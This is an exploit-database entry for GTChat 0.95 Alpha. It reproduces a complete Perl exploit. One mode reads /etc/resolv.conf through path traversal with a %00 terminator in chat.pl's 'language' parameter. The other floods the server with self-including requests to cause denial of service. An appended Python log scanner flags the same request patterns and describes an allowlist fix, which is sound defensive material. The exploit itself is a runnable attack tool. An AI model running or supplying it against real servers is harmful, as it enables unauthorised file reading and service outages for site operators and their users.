GTChat 0.95 Alpha – Remote Denial of Service

Vulnerability ID: 1055341
Vulnerability type:
Published: 2005-08-18
Updated: 2005-08-18
CVE ID: N/A
CNNVD-ID: N/A
Platform: CGI
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/1157
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
#!/usr/bin/perl

use LWP::Simple;

# Require server, path and mode; the request count is only used in dos mode.
if (@ARGV < 3)
{
    print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n";
    print "sever -  URL chat\n";
    print "path  -  path to chat.pl\n";
    print "mode  -  poc or dos,\n";
    print "                    poc - simple check without DoS and exit,\n";
    print "                    dos - DoS, you must set count for requests in 4 argument.\n\n";
    exit ();
}
$DoS      =     "dos";
$POC      =     "poc";
$server   =  $ARGV[0];
$path     =  $ARGV[1];
$mode     =  $ARGV[2];
$count    =  $ARGV[3];
print qq(
                                           ###################################
                                           # GTChat <= 0.95 Alpha remote DoS #
                                           #   tested on GTChat 0.95 Alpha   #
                                           # (c)oded by x97Rang 2005 RST/GHC #
                                           #    Respect: b1f, 1dt.w0lf, ed   #
                                           ################################### );

# poc mode: one request whose "language" parameter is a NUL-terminated relative path.
if ($mode eq $POC)
{
    print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";
    $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
    $content = get "$URL";
    # Keywords that normally appear in resolv.conf indicate the file was returned.
    if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/)
    {
        print "File read successfully, remote system is *nix and $server are VULNERABLE!\n";
        exit();
    }
    if ($content =~ /Fatal error/)
    {
        print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n";
        print "=== OUTPUT ===============================================================================\n";
        print "\n$content\n";
        print "=============================================================================== OUTPUT ===\n";
        exit();
    }
    else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; }
}

# dos mode: repeat a request whose "language" parameter names chat.pl itself.
if ($mode eq $DoS)
{
    if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }
    print "\nSend $count DoS requests to $server...\n";
    $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
    for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
    print "Done, packets sended.\n";
}

# milw0rm.com [2005-08-18]
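
Added example, not part of the original exploit or of GTChat: both requests in the script above put a `%00`-terminated value in the `language` parameter of `chat.pl`, so a web-server access log can be scanned for that pattern. The log lines are constructed, and the rule that a legitimate language name contains only letters, digits, `_` and `-` is an assumption of this example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines for illustration; addresses and paths are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Aug/2005:10:00:01 +0000] "GET /cgi-bin/gtchat/chat.pl?language=german HTTP/1.0" 200 5120
192.0.2.66 - - [18/Aug/2005:10:00:05 +0000] "GET /cgi-bin/gtchat/chat.pl?language=../../../../etc/resolv.conf%00 HTTP/1.0" 200 311
192.0.2.66 - - [18/Aug/2005:10:00:07 +0000] "GET /cgi-bin/gtchat/chat.pl?language=chat.pl%00 HTTP/1.0" 500 0
192.0.2.66 - - [18/Aug/2005:10:00:07 +0000] "GET /cgi-bin/gtchat/chat.pl?language=chat.pl%00 HTTP/1.0" 500 0
192.0.2.20 - - [18/Aug/2005:10:00:09 +0000] "GET /index.html?language=..%2F HTTP/1.0" 200 900
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+)[^"]*"')
PLAIN_NAME = re.compile(r"[A-Za-z0-9_-]+")  # assumption: shape of a legitimate language name


def reasons(target):
    """Return why a request target looks like abuse of chat.pl's language parameter."""
    parts = urlsplit(target)
    if not parts.path.endswith("/chat.pl"):
        return []
    found = []
    for value in parse_qs(parts.query, keep_blank_values=True).get("language", []):
        if "\x00" in value:  # %00 is percent-decoded to a NUL byte
            found.append("nul-byte")
        if ".." in value or "/" in value or "\\" in value:
            found.append("path-traversal")
        elif not PLAIN_NAME.fullmatch(value):
            found.append("unexpected-value")
    return found


def scan(log_text):
    """Map client address -> {reason: count} over all flagged requests in the log."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m:
            for reason in reasons(m.group(2)):
                hits[m.group(1)][reason] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}


if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, counts)
```

A high `nul-byte` count from one address in a short window corresponds to the script's repeated-request mode; the same allowlist check applied to the parameter before it is used as a file name is the server-side counterpart.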
